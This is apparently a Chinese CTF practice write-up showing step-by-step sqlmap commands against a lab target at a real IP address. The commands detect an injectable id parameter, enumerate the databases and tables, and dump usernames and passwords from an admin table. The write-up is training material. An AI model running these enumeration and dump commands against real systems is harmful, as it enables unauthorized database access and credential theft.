Bootstrap

CTF刷题--SQL注入(sqlmap)

靶场第一题,解法2,使用sqlmap

解题思路(在kali下操作)

1、检测是否有sql注入漏洞
检测出来有id
sqlmap -u http://59.63.200.79:8003/?id=1
在这里插入图片描述
2、获取当前用户
sqlmap -u http://59.63.200.79:8003/?id=1 --current-user

在这里插入图片描述
3、获取当前数据库
sqlmap -u http://59.63.200.79:8003/?id=1 --current-db
在这里插入图片描述
4、获取所有数据库
sqlmap -u http://59.63.200.79:8003/?id=1 --dbs
在这里插入图片描述
5、获取数据库表名
数据库maoshe下的所有表
sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe --tables

在这里插入图片描述
6、获取所有字段
获取admin表里的字段
sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns

在这里插入图片描述
7、获取字段值
sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C Id,password,username --dump

在这里插入图片描述
最后,得到用户名和密码

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

最新收录
第19章 Vue与渐进式Web应用(PWA)深度集成
MySQL 7种JOIN
C++ cout的使用,看这一篇就够了
SqlServer数据插入性能小记
AutoIt安装下载及使用总结
软件架构之系统可靠性分析与设计
ga统计
YOLOv11-ultralytics-8.3.67部分代码阅读笔记-tasks.py
JAVA SM2 数字证书生成
Spring Boot学习笔记(二十一)Spring boot 数据校验 @Validated、@Valid用法详解